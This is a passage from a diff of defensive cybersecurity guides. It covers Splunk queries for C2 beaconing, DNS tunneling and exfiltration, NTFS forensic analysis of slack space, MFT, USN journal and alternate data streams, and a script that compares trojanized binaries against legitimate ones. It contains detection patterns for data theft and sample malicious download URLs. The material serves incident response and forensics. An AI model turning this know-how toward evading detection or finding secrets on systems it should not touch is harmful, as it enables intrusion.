| table _time, host, SourceImage, SourceUser, GrantedAccess
|
||||
```
|
||||
|
||||
### Step 4: Analyze Network Activity
|
||||
|
||||
Correlate network logs with endpoint events:
|
||||
|
||||
```spl
|
||||
| Detect C2 beaconing pattern
|
||||
index=proxy OR index=firewall dest_ip="185.220.101.42"
|
||||
| timechart span=1m count by src_ip
|
||||
| where count > 0
|
||||
|
||||
| Detect DNS tunneling (high query volume to single domain)
|
||||
index=dns
|
||||
| rex field=query "(?<subdomain>[^\.]+)\.(?<domain>[^\.]+\.[^\.]+)$"
|
||||
| stats count, avg(len(query)) as avg_query_len by domain, src_ip
|
||||
| where count > 500 AND avg_query_len > 40
|
||||
| sort -count
|
||||
|
||||
| Detect large data transfers (potential exfiltration)
|
||||
index=proxy action=allowed
|
||||
| stats sum(bytes_out) as total_bytes by src_ip, dest_ip, dest_host
|
||||
| eval total_MB=round(total_bytes/1024/1024,2)
|
||||
| where total_MB > 100
|
||||
| sort -total_MB
|
||||
```
|
||||
|
||||
### Step 5: Build the Incident Timeline
|
||||
|
||||
Reconstruct a unified timeline across all log sources:
|
||||
|
||||
```spl
|
||||
| Unified incident timeline
|
||||
index=windows OR index=sysmon OR index=proxy OR index=firewall
|
||||
(host="WKSTN-042" OR src_ip="10.1.5.42" OR user="jsmith")
|
||||
earliest="2025-11-15T14:00:00" latest="2025-11-15T16:00:00"
|
||||
| eval event_summary=case(
|
||||
sourcetype=="WinEventLog:Security" AND EventCode==4624, "Logon: ".TargetUserName." from ".src_ip,
|
||||
sourcetype=="WinEventLog:Security" AND EventCode==4625, "Failed logon: ".TargetUserName,
|
||||
sourcetype=="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" AND EventCode==1,
|
||||
"Process: ".Image." by ".User,
|
||||
sourcetype=="proxy", "Web: ".http_method." ".url,
|
||||
1==1, sourcetype.": ".EventCode)
|
||||
| table _time, sourcetype, host, event_summary
|
||||
| sort _time
|
||||
```
|
||||
|
||||
### Step 6: Create Detection Rules
|
||||
|
||||
Convert investigation findings into persistent Splunk correlation searches:
|
||||
|
||||
```spl
|
||||
| Correlation search: PowerShell spawned by Office applications
|
||||
index=sysmon EventCode=1
|
||||
Image="*\\powershell.exe"
|
||||
(ParentImage="*\\winword.exe" OR ParentImage="*\\excel.exe"
|
||||
OR ParentImage="*\\outlook.exe")
|
||||
| eval severity="high"
|
||||
| eval mitre_technique="T1059.001"
|
||||
| collect index=notable_events
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **SPL (Search Processing Language)** | Splunk's query language for searching, filtering, transforming, and visualizing machine data |
|
||||
| **CIM (Common Information Model)** | Splunk's field normalization standard that maps vendor-specific field names to common names for cross-source queries |
|
||||
| **Notable Event** | An event in Splunk Enterprise Security flagged for analyst review based on a correlation search match |
|
||||
| **Data Model** | Structured representation of indexed data in Splunk enabling accelerated searches and pivot-based analysis |
|
||||
| **Sourcetype** | Classification label in Splunk that defines the format and parsing rules for a specific log type |
|
||||
| **Correlation Search** | Scheduled Splunk search that runs continuously and generates notable events when conditions are met |
|
||||
| **Timechart** | SPL command that creates time-series visualizations for identifying patterns, anomalies, and trends |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Splunk Enterprise Security (ES)**: Premium SIEM application providing correlation searches, risk-based alerting, and investigation workbench
|
||||
- **Splunk SOAR**: Orchestration platform integrated with Splunk ES for automated response playbooks
|
||||
- **Sysmon**: Microsoft system monitoring tool providing detailed process, network, and file change telemetry ingested into Splunk
|
||||
- **Splunk Attack Analyzer**: Automated threat analysis that detonates suspicious files and URLs, feeding results into Splunk
|
||||
- **BOSS of the SOC (BOTS)**: SANS/Splunk training dataset for practicing incident investigation SPL queries
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Investigating Credential Stuffing Leading to Account Takeover
|
||||
|
||||
**Context**: Security operations receives an alert for multiple successful logins to a single account from geographically dispersed IP addresses within a 30-minute window.
|
||||
|
||||
**Approach**:
|
||||
1. Query Event ID 4624 for the affected account to map all login sources and times
|
||||
2. Correlate login IPs against threat intelligence feeds using a Splunk lookup table
|
||||
3. Check proxy logs for suspicious activity from the authenticated sessions
|
||||
4. Search for lateral movement from the compromised account (Event ID 4624 Type 3 to other hosts)
|
||||
5. Build a timeline showing credential stuffing attempts, successful login, and post-compromise activity
|
||||
6. Create a correlation search to detect similar patterns on other accounts
|
||||
|
||||
**Pitfalls**:
|
||||
- Searching only the last 24 hours when the credential stuffing may have occurred over weeks
|
||||
- Not checking for VPN logs that may show the same account authenticating from impossible travel distances
|
||||
- Failing to normalize timestamps across log sources in different time zones
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
SPLUNK INVESTIGATION REPORT
|
||||
============================
|
||||
Incident: INC-2025-1547
|
||||
Analyst: [Name]
|
||||
Investigation Period: 2025-11-14 00:00 UTC - 2025-11-16 00:00 UTC
|
||||
|
||||
SEARCH SCOPE
|
||||
Indexes: windows, sysmon, proxy, firewall, dns
|
||||
Hosts: WKSTN-042, SRV-FILE01
|
||||
Users: jsmith, svc-backup
|
||||
Source IPs: 10.1.5.42, 10.1.10.15
|
||||
|
||||
KEY FINDINGS
|
||||
1. [timestamp] - Initial compromise via phishing (Sysmon Event 1)
|
||||
2. [timestamp] - C2 established (proxy logs, beacon pattern detected)
|
||||
3. [timestamp] - Credential theft (Sysmon Event 10, LSASS access)
|
||||
4. [timestamp] - Lateral movement to SRV-FILE01 (Event 4624 Type 3)
|
||||
5. [timestamp] - Data staging and exfiltration (proxy bytes_out anomaly)
|
||||
|
||||
SPL QUERIES USED
|
||||
[numbered list of key queries with descriptions]
|
||||
|
||||
DETECTION GAPS IDENTIFIED
|
||||
- No Sysmon deployed on SRV-FILE01 (blind spot)
|
||||
- Proxy logs missing SSL inspection for C2 domain
|
||||
- PowerShell ScriptBlock logging not enabled
|
||||
|
||||
RECOMMENDED DETECTIONS
|
||||
1. Correlation search for Office-spawned PowerShell
|
||||
2. Threshold alert for LSASS access patterns
|
||||
3. Behavioral rule for beacon-interval network traffic
|
||||
```
|
||||
@@ -0,0 +1,382 @@
|
||||
---
|
||||
name: analyzing-slack-space-and-file-system-artifacts
|
||||
description: Examine file system slack space, MFT entries, USN journal, and alternate data streams to recover hidden data and reconstruct file activity on NTFS volumes.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, slack-space, ntfs, mft, usn-journal, alternate-data-streams, file-system-analysis]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Slack Space and File System Artifacts
|
||||
|
||||
## When to Use
|
||||
- When searching for hidden or residual data in file system slack space
|
||||
- For analyzing NTFS Master File Table (MFT) entries for deleted file metadata
|
||||
- When reconstructing file operations from the USN Change Journal
|
||||
- For detecting Alternate Data Streams (ADS) used to hide data or malware
|
||||
- During deep forensic analysis requiring examination beyond standard file recovery
|
||||
|
||||
## Prerequisites
|
||||
- Forensic disk image with NTFS file system
|
||||
- The Sleuth Kit (TSK) tools: istat, icat, fls, blkls, blkstat
|
||||
- MFTECmd (Eric Zimmerman) for MFT parsing
|
||||
- MFTExplorer for interactive MFT analysis
|
||||
- Understanding of NTFS structures (MFT, $UsnJrnl, $LogFile, ADS)
|
||||
- Python with analyzeMFT or mft library for automated parsing
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Identify and Extract NTFS File System Artifacts
|
||||
|
||||
```bash
|
||||
# Determine partition layout
|
||||
mmls /cases/case-2024-001/images/evidence.dd
|
||||
|
||||
# Extract key NTFS system files
|
||||
# $MFT - Master File Table
|
||||
icat -o 2048 /cases/case-2024-001/images/evidence.dd 0 > /cases/case-2024-001/ntfs/MFT
|
||||
|
||||
# $UsnJrnl:$J - USN Change Journal
|
||||
icat -o 2048 /cases/case-2024-001/images/evidence.dd 62-128 > /cases/case-2024-001/ntfs/UsnJrnl_J
|
||||
|
||||
# $LogFile - Transaction log
|
||||
icat -o 2048 /cases/case-2024-001/images/evidence.dd 2 > /cases/case-2024-001/ntfs/LogFile
|
||||
|
||||
# Extract all slack space from the volume
|
||||
blkls -s -o 2048 /cases/case-2024-001/images/evidence.dd > /cases/case-2024-001/ntfs/slack_space.raw
|
||||
|
||||
# Get file system information
|
||||
fsstat -o 2048 /cases/case-2024-001/images/evidence.dd | tee /cases/case-2024-001/ntfs/fs_info.txt
|
||||
```
|
||||
|
||||
### Step 2: Analyze the Master File Table (MFT)
|
||||
|
||||
```bash
|
||||
# Parse MFT with MFTECmd (Eric Zimmerman)
|
||||
MFTECmd.exe -f "C:\cases\ntfs\MFT" --csv "C:\cases\analysis\" --csvf mft_analysis.csv
|
||||
|
||||
# Parse with analyzeMFT (Python)
|
||||
pip install analyzeMFT
|
||||
|
||||
analyzeMFT.py -f /cases/case-2024-001/ntfs/MFT \
|
||||
-o /cases/case-2024-001/analysis/mft_analysis.csv \
|
||||
-c
|
||||
|
||||
# Custom MFT analysis with Python
|
||||
python3 << 'PYEOF'
|
||||
from mft import PyMft
|
||||
import csv
|
||||
|
||||
mft = PyMft(open('/cases/case-2024-001/ntfs/MFT', 'rb').read())
|
||||
|
||||
deleted_files = []
|
||||
suspicious_files = []
|
||||
|
||||
for entry in mft.entries():
|
||||
if entry is None:
|
||||
continue
|
||||
|
||||
filename = entry.get_filename()
|
||||
if filename is None:
|
||||
continue
|
||||
|
||||
is_deleted = not entry.is_active()
|
||||
is_directory = entry.is_directory()
|
||||
created = entry.get_created_timestamp()
|
||||
modified = entry.get_modified_timestamp()
|
||||
mft_modified = entry.get_mft_modified_timestamp()
|
||||
size = entry.get_file_size()
|
||||
|
||||
# Flag deleted files for recovery
|
||||
if is_deleted and not is_directory and size > 0:
|
||||
deleted_files.append({
|
||||
'filename': filename,
|
||||
'size': size,
|
||||
'created': str(created),
|
||||
'modified': str(modified),
|
||||
'entry_number': entry.entry_number
|
||||
})
|
||||
|
||||
# Detect timestomping (MFT modified time != $SI modified time)
|
||||
si_modified = entry.get_si_modified_timestamp()
|
||||
fn_modified = entry.get_fn_modified_timestamp()
|
||||
if si_modified and fn_modified:
|
||||
if abs((si_modified - fn_modified).total_seconds()) > 86400: # >1 day difference
|
||||
suspicious_files.append({
|
||||
'filename': filename,
|
||||
'si_modified': str(si_modified),
|
||||
'fn_modified': str(fn_modified),
|
||||
'delta': str(si_modified - fn_modified)
|
||||
})
|
||||
|
||||
print(f"=== DELETED FILES (recoverable metadata) ===")
|
||||
print(f"Total: {len(deleted_files)}")
|
||||
for f in deleted_files[:20]:
|
||||
print(f" [{f['modified']}] {f['filename']} ({f['size']} bytes)")
|
||||
|
||||
print(f"\n=== POTENTIAL TIMESTOMPING ===")
|
||||
print(f"Total suspicious: {len(suspicious_files)}")
|
||||
for f in suspicious_files[:10]:
|
||||
print(f" {f['filename']}: $SI={f['si_modified']}, $FN={f['fn_modified']} (delta: {f['delta']})")
|
||||
PYEOF
|
||||
```
|
||||
|
||||
### Step 3: Analyze Slack Space for Hidden Data
|
||||
|
||||
```bash
|
||||
# Search slack space for strings
|
||||
strings -a /cases/case-2024-001/ntfs/slack_space.raw > /cases/case-2024-001/analysis/slack_strings.txt
|
||||
|
||||
# Search for specific patterns in slack space
|
||||
grep -iab "password\|secret\|confidential\|credit.card\|ssn" \
|
||||
/cases/case-2024-001/ntfs/slack_space.raw > /cases/case-2024-001/analysis/slack_keywords.txt
|
||||
|
||||
# Analyze individual file slack
|
||||
python3 << 'PYEOF'
|
||||
import struct
|
||||
|
||||
# File slack consists of:
|
||||
# 1. RAM slack: bytes between file end and next sector boundary (filled with RAM content or zeros)
|
||||
# 2. Drive slack: remaining sectors in the cluster after the last file sector
|
||||
|
||||
# Analyze slack for specific MFT entries
|
||||
# Using Sleuth Kit to get file slack for a specific file
|
||||
import subprocess
|
||||
|
||||
# Get file details
|
||||
result = subprocess.run(
|
||||
['istat', '-o', '2048', '/cases/case-2024-001/images/evidence.dd', '14523'],
|
||||
capture_output=True, text=True
|
||||
)
|
||||
print(result.stdout)
|
||||
|
||||
# The output shows data runs - the last cluster may contain slack data
|
||||
# Calculate slack size: (allocated_size - file_size) bytes
|
||||
PYEOF
|
||||
|
||||
# Search for file signatures in slack space (embedded files)
|
||||
foremost -t jpg,pdf,zip -i /cases/case-2024-001/ntfs/slack_space.raw \
|
||||
-o /cases/case-2024-001/carved/slack_carved/
|
||||
|
||||
# Use bulk_extractor to find structured data in slack
|
||||
bulk_extractor -o /cases/case-2024-001/analysis/bulk_extract/ \
|
||||
/cases/case-2024-001/ntfs/slack_space.raw
|
||||
```
|
||||
|
||||
### Step 4: Parse the USN Change Journal
|
||||
|
||||
```bash
|
||||
# Parse USN Journal with MFTECmd
|
||||
MFTECmd.exe -f "C:\cases\ntfs\UsnJrnl_J" --csv "C:\cases\analysis\" --csvf usn_journal.csv
|
||||
|
||||
# Python USN Journal parsing
|
||||
pip install pyusn
|
||||
|
||||
python3 << 'PYEOF'
|
||||
import struct
|
||||
import csv
|
||||
from datetime import datetime, timedelta
|
||||
|
||||
def parse_usn_record(data, offset):
|
||||
"""Parse a single USN_RECORD_V2."""
|
||||
if offset + 8 > len(data):
|
||||
return None, offset
|
||||
|
||||
record_len = struct.unpack_from('<I', data, offset)[0]
|
||||
if record_len < 56 or record_len > 65536 or offset + record_len > len(data):
|
||||
return None, offset + 8
|
||||
|
||||
major_ver = struct.unpack_from('<H', data, offset + 4)[0]
|
||||
if major_ver != 2:
|
||||
return None, offset + record_len
|
||||
|
||||
mft_ref = struct.unpack_from('<Q', data, offset + 8)[0] & 0xFFFFFFFFFFFF
|
||||
parent_ref = struct.unpack_from('<Q', data, offset + 16)[0] & 0xFFFFFFFFFFFF
|
||||
usn = struct.unpack_from('<Q', data, offset + 24)[0]
|
||||
timestamp = struct.unpack_from('<Q', data, offset + 32)[0]
|
||||
reason = struct.unpack_from('<I', data, offset + 40)[0]
|
||||
source_info = struct.unpack_from('<I', data, offset + 44)[0]
|
||||
security_id = struct.unpack_from('<I', data, offset + 48)[0]
|
||||
file_attrs = struct.unpack_from('<I', data, offset + 52)[0]
|
||||
filename_len = struct.unpack_from('<H', data, offset + 56)[0]
|
||||
filename_off = struct.unpack_from('<H', data, offset + 58)[0]
|
||||
|
||||
name = data[offset + filename_off:offset + filename_off + filename_len].decode('utf-16-le', errors='ignore')
|
||||
|
||||
# Convert Windows FILETIME to datetime
|
||||
ts = datetime(1601, 1, 1) + timedelta(microseconds=timestamp // 10)
|
||||
|
||||
# Decode reason flags
|
||||
reasons = []
|
||||
reason_flags = {
|
||||
0x01: 'DATA_OVERWRITE', 0x02: 'DATA_EXTEND', 0x04: 'DATA_TRUNCATION',
|
||||
0x10: 'NAMED_DATA_OVERWRITE', 0x20: 'NAMED_DATA_EXTEND',
|
||||
0x100: 'FILE_CREATE', 0x200: 'FILE_DELETE', 0x400: 'EA_CHANGE',
|
||||
0x800: 'SECURITY_CHANGE', 0x1000: 'RENAME_OLD_NAME', 0x2000: 'RENAME_NEW_NAME',
|
||||
0x4000: 'INDEXABLE_CHANGE', 0x8000: 'BASIC_INFO_CHANGE',
|
||||
0x10000: 'HARD_LINK_CHANGE', 0x20000: 'COMPRESSION_CHANGE',
|
||||
0x40000: 'ENCRYPTION_CHANGE', 0x80000: 'OBJECT_ID_CHANGE',
|
||||
0x100000: 'REPARSE_POINT_CHANGE', 0x200000: 'STREAM_CHANGE',
|
||||
0x80000000: 'CLOSE'
|
||||
}
|
||||
for flag, desc in reason_flags.items():
|
||||
if reason & flag:
|
||||
reasons.append(desc)
|
||||
|
||||
record = {
|
||||
'timestamp': ts.strftime('%Y-%m-%d %H:%M:%S'),
|
||||
'filename': name,
|
||||
'mft_entry': mft_ref,
|
||||
'parent_entry': parent_ref,
|
||||
'reasons': '|'.join(reasons),
|
||||
'usn': usn
|
||||
}
|
||||
|
||||
return record, offset + record_len
|
||||
|
||||
# Parse the journal
|
||||
with open('/cases/case-2024-001/ntfs/UsnJrnl_J', 'rb') as f:
|
||||
data = f.read()
|
||||
|
||||
records = []
|
||||
offset = 0
|
||||
while offset < len(data) - 8:
|
||||
record, offset = parse_usn_record(data, offset)
|
||||
if record:
|
||||
records.append(record)
|
||||
else:
|
||||
offset += 8 # Skip zeros
|
||||
|
||||
# Filter for deletion events
|
||||
deletions = [r for r in records if 'FILE_DELETE' in r['reasons']]
|
||||
creations = [r for r in records if 'FILE_CREATE' in r['reasons']]
|
||||
renames = [r for r in records if 'RENAME_NEW_NAME' in r['reasons']]
|
||||
|
||||
print(f"Total USN records: {len(records)}")
|
||||
print(f"File creations: {len(creations)}")
|
||||
print(f"File deletions: {len(deletions)}")
|
||||
print(f"File renames: {len(renames)}")
|
||||
|
||||
print("\n=== RECENT DELETIONS ===")
|
||||
for r in deletions[-20:]:
|
||||
print(f" [{r['timestamp']}] DELETED: {r['filename']} (MFT#{r['mft_entry']})")
|
||||
|
||||
# Write full journal to CSV
|
||||
with open('/cases/case-2024-001/analysis/usn_journal.csv', 'w', newline='') as f:
|
||||
writer = csv.DictWriter(f, fieldnames=['timestamp', 'filename', 'mft_entry', 'parent_entry', 'reasons', 'usn'])
|
||||
writer.writeheader()
|
||||
writer.writerows(records)
|
||||
PYEOF
|
||||
```
|
||||
|
||||
### Step 5: Detect and Analyze Alternate Data Streams
|
||||
|
||||
```bash
|
||||
# List all Alternate Data Streams in the image
|
||||
find /mnt/evidence -exec getfattr -d {} \; 2>/dev/null | grep -i "ads\|zone\|stream"
|
||||
|
||||
# Using Sleuth Kit to find ADS
|
||||
fls -r -o 2048 /cases/case-2024-001/images/evidence.dd | grep ":" | \
|
||||
tee /cases/case-2024-001/analysis/ads_list.txt
|
||||
|
||||
# Extract specific ADS content
|
||||
# Format: icat image inode:ads_name
|
||||
icat -o 2048 /cases/case-2024-001/images/evidence.dd 14523:hidden_stream \
|
||||
> /cases/case-2024-001/analysis/extracted_ads.bin
|
||||
|
||||
# Check Zone.Identifier streams (download origin tracking)
|
||||
fls -r -o 2048 /cases/case-2024-001/images/evidence.dd | grep "Zone.Identifier" | \
|
||||
while read line; do
|
||||
inode=$(echo "$line" | awk '{print $2}' | tr -d ':')
|
||||
echo "=== $line ==="
|
||||
icat -o 2048 /cases/case-2024-001/images/evidence.dd "${inode}:Zone.Identifier" 2>/dev/null
|
||||
echo ""
|
||||
done > /cases/case-2024-001/analysis/zone_identifiers.txt
|
||||
|
||||
# Zone.Identifier content reveals:
|
||||
# [ZoneTransfer]
|
||||
# ZoneId=3 (3 = Internet, indicating file was downloaded)
|
||||
# ReferrerUrl=https://malicious-site.com/payload.exe
|
||||
# HostUrl=https://cdn.malicious-site.com/payload.exe
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Concept | Description |
|
||||
|---------|-------------|
|
||||
| File slack | Unused space between file end and cluster boundary containing residual data |
|
||||
| RAM slack | Portion of slack from file end to sector boundary (historically filled with RAM) |
|
||||
| MFT ($MFT) | Master File Table - NTFS metadata database with entries for every file |
|
||||
| USN Journal ($UsnJrnl) | Change journal recording all file/directory modifications on NTFS |
|
||||
| Alternate Data Streams | NTFS feature allowing multiple data streams per file (hidden storage) |
|
||||
| $STANDARD_INFORMATION | MFT attribute with timestamps modifiable by user-mode applications |
|
||||
| $FILE_NAME | MFT attribute with timestamps only modifiable by the kernel |
|
||||
| Timestomping | Anti-forensic technique modifying file timestamps to avoid detection |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
| Tool | Purpose |
|
||||
|------|---------|
|
||||
| MFTECmd | Eric Zimmerman MFT and USN Journal parser with CSV output |
|
||||
| MFTExplorer | Interactive GUI tool for MFT analysis |
|
||||
| analyzeMFT | Python MFT parser with CSV/JSON output |
|
||||
| The Sleuth Kit | File system forensics toolkit (fls, icat, blkls, istat) |
|
||||
| bulk_extractor | Feature extraction from raw data including slack space |
|
||||
| NTFS Log Tracker | Tool for parsing $LogFile transaction records |
|
||||
| streams.exe | Sysinternals tool for listing NTFS Alternate Data Streams |
|
||||
| Plaso | Super-timeline tool parsing MFT and USN Journal |
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
**Scenario 1: Anti-Forensics Detection via Timestomping**
|
||||
Compare $STANDARD_INFORMATION timestamps with $FILE_NAME timestamps in MFT entries, flag files where $SI timestamps predate $FN timestamps (impossible in normal operation), identify timestomped files as evidence of deliberate manipulation, correlate with other timeline evidence.
|
||||
|
||||
**Scenario 2: Hidden Data in Alternate Data Streams**
|
||||
Scan for ADS attached to files beyond the standard Zone.Identifier, extract ADS content for analysis, check for hidden executables or documents stored in ADS, correlate ADS creation with user activity timeline, document findings for evidence.
|
||||
|
||||
**Scenario 3: Deleted File Reconstruction from MFT**
|
||||
Parse MFT for inactive (deleted) entries, extract filenames, sizes, and timestamps of deleted files, recover file content using icat if data clusters are not overwritten, build list of deleted evidence files, correlate with USN Journal delete events.
|
||||
|
||||
**Scenario 4: File Activity Reconstruction from USN Journal**
|
||||
Parse the USN Change Journal for the investigation period, identify file creation, modification, rename, and deletion events, reconstruct the sequence of file operations, detect evidence of data staging (create, copy, compress, delete pattern), identify anti-forensic file wiping.
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
File System Artifact Analysis:
|
||||
Volume: NTFS (Partition 2, 465 GB)
|
||||
Cluster Size: 4096 bytes
|
||||
|
||||
MFT Analysis:
|
||||
Total Entries: 456,789
|
||||
Active Files: 234,567
|
||||
Deleted Entries: 12,345 (8,901 with recoverable metadata)
|
||||
Timestomped Files: 23 (SI/FN mismatch detected)
|
||||
|
||||
USN Journal:
|
||||
Records Parsed: 2,345,678
|
||||
Date Range: 2024-01-01 to 2024-01-20
|
||||
File Creations: 45,678
|
||||
File Deletions: 23,456
|
||||
File Renames: 12,345
|
||||
|
||||
Alternate Data Streams:
|
||||
Total ADS Found: 1,234
|
||||
Zone.Identifier: 890 (downloaded files)
|
||||
Custom/Suspicious ADS: 5 (hidden data detected)
|
||||
|
||||
Slack Space:
|
||||
Total Slack: 12.3 GB
|
||||
Keyword Hits: 45 (passwords, credit cards)
|
||||
Carved Files: 23 from slack space
|
||||
|
||||
Suspicious Findings:
|
||||
- 23 files with timestomped timestamps
|
||||
- 5 files with hidden ADS containing data
|
||||
- USN shows mass deletion on 2024-01-18 (anti-forensics)
|
||||
- Slack space contains residual email fragments
|
||||
|
||||
Reports: /cases/case-2024-001/analysis/
|
||||
```
|
||||
@@ -0,0 +1,133 @@
|
||||
---
|
||||
name: analyzing-supply-chain-malware-artifacts
|
||||
description: Investigate supply chain attack artifacts including trojanized software updates, compromised build pipelines, and sideloaded dependencies to identify intrusion vectors and scope of compromise.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [supply-chain, malware-analysis, trojanized-software, solarwinds, 3cx, dependency-confusion, software-integrity]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Supply Chain Malware Artifacts
|
||||
|
||||
## Overview
|
||||
|
||||
Supply chain attacks compromise legitimate software distribution channels to deliver malware through trusted update mechanisms. Notable examples include SolarWinds SUNBURST (2020, affecting 18,000+ customers), 3CX SmoothOperator (2023, a cascading supply chain attack originating from Trading Technologies), and numerous npm/PyPI package poisoning campaigns. Analysis involves comparing trojanized binaries against legitimate versions, identifying injected code in build artifacts, examining code signing anomalies, and tracing the infection chain from initial compromise through payload delivery. As of 2025, supply chain attacks account for 30% of all breaches, a 100% increase from prior years.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.9+ with `pefile`, `ssdeep`, `hashlib`
|
||||
- Binary diff tools (BinDiff, Diaphora)
|
||||
- Code signing verification tools (sigcheck, codesign)
|
||||
- Software composition analysis (SCA) tools
|
||||
- Access to legitimate software versions for comparison
|
||||
- Package repository monitoring (npm, PyPI, NuGet)
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Binary Comparison Analysis
|
||||
|
||||
```python
|
||||
#!/usr/bin/env python3
|
||||
"""Compare trojanized binary against legitimate version."""
|
||||
import hashlib
|
||||
import pefile
|
||||
import sys
|
||||
import json
|
||||
|
||||
|
||||
def compare_pe_files(legitimate_path, suspect_path):
|
||||
"""Compare PE file structures between legitimate and suspect versions."""
|
||||
legit_pe = pefile.PE(legitimate_path)
|
||||
suspect_pe = pefile.PE(suspect_path)
|
||||
|
||||
report = {"differences": [], "suspicious_sections": [], "import_changes": []}
|
||||
|
||||
# Compare sections
|
||||
legit_sections = {s.Name.rstrip(b'\x00').decode(): {
|
||||
"size": s.SizeOfRawData,
|
||||
"entropy": s.get_entropy(),
|
||||
"characteristics": s.Characteristics,
|
||||
} for s in legit_pe.sections}
|
||||
|
||||
suspect_sections = {s.Name.rstrip(b'\x00').decode(): {
|
||||
"size": s.SizeOfRawData,
|
||||
"entropy": s.get_entropy(),
|
||||
"characteristics": s.Characteristics,
|
||||
} for s in suspect_pe.sections}
|
||||
|
||||
# Find new or modified sections
|
||||
for name, props in suspect_sections.items():
|
||||
if name not in legit_sections:
|
||||
report["suspicious_sections"].append({
|
||||
"name": name, "reason": "New section not in legitimate version",
|
||||
"size": props["size"], "entropy": round(props["entropy"], 2),
|
||||
})
|
||||
elif abs(props["size"] - legit_sections[name]["size"]) > 1024:
|
||||
report["suspicious_sections"].append({
|
||||
"name": name, "reason": "Section size significantly changed",
|
||||
"legit_size": legit_sections[name]["size"],
|
||||
"suspect_size": props["size"],
|
||||
})
|
||||
|
||||
# Compare imports
|
||||
legit_imports = set()
|
||||
if hasattr(legit_pe, 'DIRECTORY_ENTRY_IMPORT'):
|
||||
for entry in legit_pe.DIRECTORY_ENTRY_IMPORT:
|
||||
for imp in entry.imports:
|
||||
if imp.name:
|
||||
legit_imports.add(f"{entry.dll.decode()}!{imp.name.decode()}")
|
||||
|
||||
suspect_imports = set()
|
||||
if hasattr(suspect_pe, 'DIRECTORY_ENTRY_IMPORT'):
|
||||
for entry in suspect_pe.DIRECTORY_ENTRY_IMPORT:
|
||||
for imp in entry.imports:
|
||||
if imp.name:
|
||||
suspect_imports.add(f"{entry.dll.decode()}!{imp.name.decode()}")
|
||||
|
||||
new_imports = suspect_imports - legit_imports
|
||||
if new_imports:
|
||||
report["import_changes"] = list(new_imports)
|
||||
|
||||
# Check code signing
|
||||
report["legit_signed"] = bool(legit_pe.OPTIONAL_HEADER.DATA_DIRECTORY[4].Size)
|
||||
report["suspect_signed"] = bool(suspect_pe.OPTIONAL_HEADER.DATA_DIRECTORY[4].Size)
|
||||
|
||||
return report
|
||||
|
||||
|
||||
def hash_file(filepath):
|
||||
"""Calculate multiple hashes for a file."""
|
||||
hashes = {}
|
||||
with open(filepath, 'rb') as f:
|
||||
data = f.read()
|
||||
for algo in ['md5', 'sha1', 'sha256']:
|
||||
h = hashlib.new(algo)
|
||||
h.update(data)
|
||||
hashes[algo] = h.hexdigest()
|
||||
return hashes
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
if len(sys.argv) < 3:
|
||||
print(f"Usage: {sys.argv[0]} <legitimate_binary> <suspect_binary>")
|
||||
sys.exit(1)
|
||||
report = compare_pe_files(sys.argv[1], sys.argv[2])
|
||||
print(json.dumps(report, indent=2))
|
||||
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- Trojanized components identified through binary diffing
|
||||
- Injected code isolated and analyzed separately
|
||||
- Code signing anomalies documented
|
||||
- Infection timeline reconstructed from build artifacts
|
||||
- Downstream impact scope assessed across affected systems
|
||||
- IOCs extracted for detection and blocking
|
||||
|
||||
## References
|
||||
|
||||
- [ReversingLabs - 3CX Supply Chain Analysis](https://www.reversinglabs.com/blog/what-went-wrong-with-the-3cx-software-supply-chain-attack-and-how-it-could-have-been-prevented)
|
||||
- [Fortinet - SolarWinds Supply Chain Attack](https://www.fortinet.com/resources/cyberglossary/solarwinds-cyber-attack)
|
||||
- [Picus - 3CX SmoothOperator Analysis](https://www.picussecurity.com/resource/blog/smoothoperator-analysis-of-3cxdesktopapp-supply-chain-attack)
|
||||
- [MITRE ATT&CK T1195 - Supply Chain Compromise](https://attack.mitre.org/techniques/T1195/)
|
||||
@@ -0,0 +1,25 @@
|
||||
# Analysis Report Template - analyzing-supply-chain-malware-artifacts
|
||||
|
||||
## Sample Information
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| SHA-256 | |
|
||||
| File Type | |
|
||||
| Analysis Date | |
|
||||
| Analyst | |
|
||||
| Classification | TLP:AMBER |
|
||||
|
||||
## Findings
|
||||
| Finding | Severity | Details |
|
||||
|---------|----------|---------|
|
||||
| | | |
|
||||
|
||||
## IOCs Extracted
|
||||
| Type | Value | Context |
|
||||
|------|-------|---------|
|
||||
| | | |
|
||||
|
||||
## Recommendations
|
||||
1.
|
||||
2.
|
||||
3.
|
||||
@@ -0,0 +1,9 @@
|
||||
# Standards Reference - analyzing-supply-chain-malware-artifacts
|
||||
|
||||
## Applicable Standards
|
||||
- MITRE ATT&CK Framework
|
||||
- NIST SP 800-83 Guide to Malware Incident Prevention
|
||||
- NIST SP 800-86 Guide to Integrating Forensic Techniques
|
||||
|
||||
## Related MITRE ATT&CK Techniques
|
||||
See SKILL.md for specific technique mappings.
|
||||
@@ -0,0 +1,11 @@
|
||||
# Analysis Workflows - analyzing-supply-chain-malware-artifacts
|
||||
|
||||
## Primary Workflow
|
||||
```
|
||||
[Sample Collection] --> [Static Analysis] --> [Dynamic Analysis] --> [IOC Extraction]
|
||||
|
|
||||
v
|
||||
[Report Generation]
|
||||
```
|
||||
|
||||
See SKILL.md for detailed step-by-step procedures.
|
||||
@@ -0,0 +1,255 @@
|
||||
---
|
||||
name: None
|
||||
